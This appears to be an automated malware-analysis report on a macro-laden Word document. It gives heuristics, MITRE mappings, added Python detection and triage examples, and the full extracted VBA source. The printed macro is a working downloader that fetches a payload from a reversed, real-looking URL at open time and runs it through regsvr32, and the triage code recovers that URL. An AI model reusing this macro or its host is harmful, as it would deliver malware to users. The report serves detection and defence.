Verdict: MALICIOUS (Risk Score 378)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros with an AutoOpen subroutine, so the code runs as soon as the document is opened with macros enabled. AutoOpen instantiates the class module fm, which declares URLDownloadToFile from urlmon.dll (with a VBA7/Win64 PtrSafe branch so the same code works in 32- and 64-bit Office). The macro reads the temp directory with Environ("tmp"), builds the drop path %tmp%\x.tmp, downloads a file to it from a URL that is stored as a reversed string literal and only un-reversed with StrReverse at call time, and then launches it with "regsvr32 <path>" through WScript.Shell (WshShell) .Exec. regsvr32 loads the file as a DLL and calls its DllRegisterServer export regardless of the .tmp extension, so the downloaded file is expected to be a native DLL: the second-stage payload. The dead arithmetic (Abs, Fix, Hex, Atn, DateSerial) and dictionary-word comments surrounding every call are filler with no effect on control flow, of the kind used to defeat simple signature matching. This is a common technique for delivering malware.
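The chain above (in-process download by Word, file written to %tmp%, Word spawning regsvr32 on that file) is what endpoint telemetry would show. The following is an added example, not code from the analyzer or from any EDR product, of detection logic run over constructed Sysmon-style events (assumed schema: event ID 1 = process create, 3 = network connect, 11 = file create; the paths, PIDs and the 203.0.113.10 documentation address are made up). The point it makes beyond the summary is that URLDownloadToFile runs inside WINWORD.EXE, so the network connection is attributed to Word itself and not to a child process; the correlation keys on the parent PID for that reason.

```python
"""Detect Office -> LOLBin process creation and escalate when the same Office
process previously connected out and wrote the file the LOLBin is asked to load.
Added example; the events are constructed, not taken from the sandbox run."""

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "msiexec.exe", "bitsadmin.exe", "cmd.exe"}

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
TMP = r"C:\Users\alice\AppData\Local\Temp"

# Constructed telemetry: Word downloads in-process (EID 3), writes %TMP%\x.tmp
# (EID 11), then spawns regsvr32 on it (EID 1). The last two events are benign
# look-alikes (installer registering a DLL, Word's print helper) that must not alert.
EVENTS = [
    {"id": 3, "ts": 1, "pid": 4120, "image": WINWORD, "dest_ip": "203.0.113.10", "dest_port": 80},
    {"id": 11, "ts": 2, "pid": 4120, "image": WINWORD, "target": TMP + r"\x.tmp"},
    {"id": 1, "ts": 3, "pid": 5212, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_pid": 4120, "parent_image": WINWORD, "cmdline": "regsvr32 " + TMP + r"\x.tmp"},
    {"id": 1, "ts": 4, "pid": 6001, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_pid": 900, "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\comp.dll"'},
    {"id": 1, "ts": 5, "pid": 6002, "image": r"C:\Windows\System32\splwow64.exe",
     "parent_pid": 4120, "parent_image": WINWORD, "cmdline": "splwow64.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per Office-parent -> LOLBin-child process creation.

    Severity is 'critical' when the parent Office process both made an outbound
    connection and created the file named on the child's command line before
    the spawn (download + drop + launch), otherwise 'high'.
    """
    alerts = []
    by_time = sorted(events, key=lambda e: e["ts"])
    for ev in by_time:
        if ev["id"] != 1:
            continue
        if basename(ev["parent_image"]) not in OFFICE_HOSTS or basename(ev["image"]) not in LOLBINS:
            continue
        # Earlier activity of the *parent* (Word), because the download happens in-process.
        earlier = [e for e in by_time if e["ts"] < ev["ts"] and e["pid"] == ev["parent_pid"]]
        cmd = ev["cmdline"].lower()
        dropped = [e["target"] for e in earlier if e["id"] == 11 and e["target"].lower() in cmd]
        connections = [f'{e["dest_ip"]}:{e["dest_port"]}' for e in earlier if e["id"] == 3]
        alerts.append({
            "rule": "office_spawns_lolbin",
            "severity": "critical" if dropped and connections else "high",
            "child_pid": ev["pid"],
            "cmdline": ev["cmdline"],
            "dropped_by_parent": dropped,
            "parent_connections": connections,
            "attack": ["T1204.002", "T1059.005"] + (["T1105"] if connections else []),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The msiexec-spawned regsvr32 and Word's splwow64.exe child are there to show the rule keys on the parent/child pair rather than on regsvr32 alone; a rule that fired on every regsvr32 invocation would drown in installer noise.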
Heuristics (9)
- ClamAV: Doc.Malware.Generic-7898874-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0.
- VBA project inside OOXML [medium, OOXML_VBA, 6 related findings]. Document contains a VBA project (VBA macros present).
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]. Matched line in script:
  #If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _
- LOLBin reference in VBA [critical, OLE_VBA_LOLBIN]. Matched line in script:
  ' Regulatory bibliography ferry Call T.oP("regsvr32 " + HF) RW = Abs(58)
- VBA URLDownloadToFile reversed-LOLBin launcher [critical, OLE_VBA_URLDOWNLOAD_REVERSED_LOLBIN]. VBA auto-exec macro downloads a payload with URLDownloadToFile from a URL stored as a reversed string (un-reversed with StrReverse at call time) and launches it through WScript.Shell.Exec via a LOLBin. This is a high-confidence downloader/launcher pattern, not an Office parser CVE. Matched line in script:
  #If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script:
  End Enum Sub AutoOpen() L = Abs(-76)
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script:
  LA = Hex(335) zk = Environ(YJ) End Function
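The reversed-LOLBin heuristic above, and the download chain described in the summary, can be reproduced with a short static triage pass over the extracted VBA source. The following is an added example, not the analyzer's own rule code: it pulls every string literal, un-reverses the ones that turn into a URL, and checks for the auto-exec, URLDownloadToFile, StrReverse, shell-exec and LOLBin tokens the heuristics key on. The sample text is the relevant lines of the macros.bas preview on this page with the filler stripped; the regexes and the verdict labels are this example's own choices.

```python
"""Static triage of extracted VBA: recover reversed URLs and flag the
AutoOpen -> URLDownloadToFile -> WScript.Shell.Exec(LOLBin) chain.
Added example, not part of the analyzer."""
import re

# Constructed input: the operative lines of this page's macros.bas preview,
# with the dead arithmetic and dictionary-word comments removed.
VBA_SOURCE = r'''
Sub AutoOpen()
    Dim T As New fm
    HF = T.zk("tmp") & "\x.tmp"
    T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
    Call T.oP("regsvr32 " + HF)
End Sub
Attribute VB_Name = "fm"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As LongPtr, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As Long
Public Function Z(y, eH)
    je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
    zk = Environ(YJ)
End Function
Public Sub oP(eH)
    Dim rg As New WshShell
    rg.exec eH
End Sub
'''

STRING_LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')          # VBA doubles embedded quotes
AUTO_EXEC = re.compile(r'\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b', re.I)
SHELL_EXEC = re.compile(r'WshShell|WScript\.Shell|\bShell\s*\(|\.Exec\b|\.Run\b', re.I)
URL = re.compile(r'^https?://[^\s"]+$', re.I)
LOLBIN = re.compile(r'\b(regsvr32|rundll32|mshta|certutil|bitsadmin|msiexec|cscript|wscript|powershell)\b', re.I)
DROP_FILE = re.compile(r'^\\?[\w.\\-]+\.(tmp|exe|dll|cab|bat|vbs|js|hta|scr)$', re.I)


def string_literals(src):
    return [m.group(1).replace('""', '"') for m in STRING_LITERAL.finditer(src)]


def find_reversed_urls(src):
    """Return every string literal that becomes a URL when reversed (StrReverse trick)."""
    return [lit[::-1] for lit in string_literals(src) if URL.match(lit[::-1])]


def triage(src):
    """Collect the indicators the heuristics on this page key on."""
    lits = string_literals(src)
    return {
        "auto_exec": bool(AUTO_EXEC.search(src)),
        "url_download": "URLDownloadToFile" in src,
        "str_reverse": bool(re.search(r'\bStrReverse\s*\(', src, re.I)),
        "shell_exec": bool(SHELL_EXEC.search(src)),
        # LOLBins are only counted inside string literals, i.e. in command strings.
        "lolbins": sorted({m.group(1).lower() for lit in lits for m in LOLBIN.finditer(lit)}),
        # Drop-file hints: literals that look like a file name with an executable-ish extension.
        "drop_file_hints": [lit for lit in lits if DROP_FILE.match(lit)],
        "decoded_urls": find_reversed_urls(src),
    }


def verdict(ind):
    """Mirror of the reversed-LOLBin launcher heuristic: all four legs of the chain present."""
    if ind["auto_exec"] and ind["url_download"] and ind["shell_exec"] and ind["decoded_urls"]:
        return "downloader-launcher"
    if ind["url_download"] or ind["shell_exec"]:
        return "suspicious"
    return "benign-looking"


if __name__ == "__main__":
    result = triage(VBA_SOURCE)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("verdict:", verdict(result))
```

The recovered URL is the destination the embedded-URL list below does not show, because the extractor only matches forward-written URLs; the drop file hint "\x.tmp" joins with the Environ("tmp") call to give %tmp%\x.tmp. Note that the URL regex deliberately requires the whole literal to be a URL after reversal; a looser search would start matching the schema namespaces that litter any OOXML file.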
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every entry below carries the extractor's "Referenced by macro" label:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/photoshop/1.0/
  - http://schemas.openxmlformats.org/officeDocument/2006/re

  Caveat: every entry in this list is an XML namespace or XMP schema identifier (OOXML/WordprocessingML, DrawingML, RDF, Adobe XMP and Photoshop metadata), the kind of string found in document.xml and embedded-image metadata of any Word file. None of them is a network indicator, and none of them appears in the macro source shown below, so the "Referenced by macro" label should not be read as evidence that the macro contacts them. The one destination the macro does contact is the reversed string literal passed to fm.Z in AutoOpen, which the URL extractor cannot match in its stored form.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4434 bytes |

SHA-256: e8d7253b5568325f8d16e04a4874874dc37888bdf72d61b06bb73e8e3bd6b46b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "f5"
Function i(H)
Dim iX
iX = DateSerial(1999, 11, 7)
Dim S
S = DateSerial(2000, 5, 8)
End Function
Function r0()
' Occasionally caitiff synod plumage famous derbyshire
b9 = Hex(155)
' Religious
R = Abs(-55)
' Smock flop
iK = Fix(58)
' Amnesty vogue many
p0 = Abs(-9)
' Nine surpass
V = Fix(-35)
' However round
Dim aw
aw = DateSerial(2016, 12, 28)
' Derek trained
Yq = Fix(19)
' Wet understand spain
k = Abs(-59)
' Rely irremediable cat belarus gill
Dim E, dq
E = 4
dq = 4 / Cos(E)
' Agility elopement
yB = Abs(24)
' Her funk refresh
NS = Fix(77)
' Seventh nebula flash pall road deserve
' Canister repairs elfin offing
' Bowl communist serve houses
' Permission
N = Abs(16)
' Adaptation accruing hose inhale unalterable
B = Abs(-36)
' Dung circuits brooklyn bookseller
lZ = Fix(20)
' Suet usurper interpose laughingly troy unmerciful
Zd = Hex(84)
' Causation eighty-four reilly
J = Abs(-1)
' Disconsolate pegasus muck yearn
oJ = Hex(53)
' Rec privateer projectors
wh = Fix(-12)
' Congressional heraldic min
ZR = Abs(58)
' Docility pericles
LO = Abs(-45)
' Czechs orion mistakes repentant val
hB = Hex(216)
' Joyously erosion
Dim Jz
Jz = 4 * Atn(1)
' Ons
' Computed condensation
' Xenophon legate export mediocrity
End Function
Public Enum K6
Mo = 1
End Enum
Sub AutoOpen()
L = Abs(-76)
' Certainly cultural computational tangent
Dim an
an = 4 * Atn(1)
Dim vV
vV = DateSerial(2001, 9, 8)
' Principles arras
' Kathleen virile
yT = Fix(38)
qd = Abs(-59)
' Monaco egypt spotless ballet moose analyst
iW = Fix(-38)
' Decent
' Capitulation snout
' Contracts sluggard innovation inside illiteracy caribbean
Dim T As New fm
' Fealty derogatory holdings
Fr = Hex(333)
' Commander
HF = T.zk("tmp") & "\x.tmp"
Dim LJ
LJ = 4 * Atn(1)
Dim Px
Px = DateSerial(2000, 12, 20)
' March operate shops
Bf = Abs(-67)
' Forte estrangement improved
' Seas
' Wheres below bier
T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
BB = Abs(57)
' Wines great-grandfather socket gateway
Dim WV, OK
WV = 8
OK = 8 / Cos(WV)
Dim m
m = 4 * Atn(1)
' Beaches gut
Dim d4
d4 = 4 * Atn(1)
' Regulatory bibliography ferry
Call T.oP("regsvr32 " + HF)
RW = Abs(58)
' Galore ironic bric-a-brac spoonfuls
' H yea forty-one animals
' Sealing
' Freshman throwing array
vo = Abs(55)
' Dissertation linda
End Sub
Attribute VB_Name = "fm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
Dim Fp
Fp = DateSerial(2012, 11, 19)
' Specialized expenditures
' Deprecate employed juvenile horses
' Reserved ancestry nassau quicksand powers
' Male paul economics mauve canny
End Sub
Private Sub Class_Terminate()
' Sunset anomaly blue pick
Q = Fix(53)
' Tingle donna hosiery
' Ana corp spectacular china guatemala
End Sub
Public Function Z(y, eH)
Bs = Fix(57)
' Channels stroke wanted given scissors
je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
kU = Abs(-58)
ko = Fix(66)
' Disagreed whirr testator physicist
LA = Hex(335)
zk = Environ(YJ)
End Function
Public Sub oP(eH)
' Borough dp spice twig richardson
Dim F3, IM
F3 = 7
IM = 7 / Cos(F3)
' Homesickness ohg.
' Protective stepfather node
bc = Fix(5)
' Expired radio
Dim rg As New WshShell
rg.exec eH
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25600 bytes |

SHA-256: 283039070de69a7e173c858274ac6e4f3a196ee738a9751505ef379f3b7cfab3

Detection
ClamAV: Doc.Malware.Generic-7898874-0
Obfuscation or payload: unlikely

Note that the "unlikely" obfuscation rating understates this sample. The macro hides its download URL with StrReverse and pads every routine with dead arithmetic (Abs, Fix, Hex, Atn, DateSerial) and dictionary-word comments; this is light obfuscation aimed at signature matching rather than at an analyst, but it is obfuscation, and it is exactly the pattern the reversed-LOLBin launcher heuristic above was written to catch.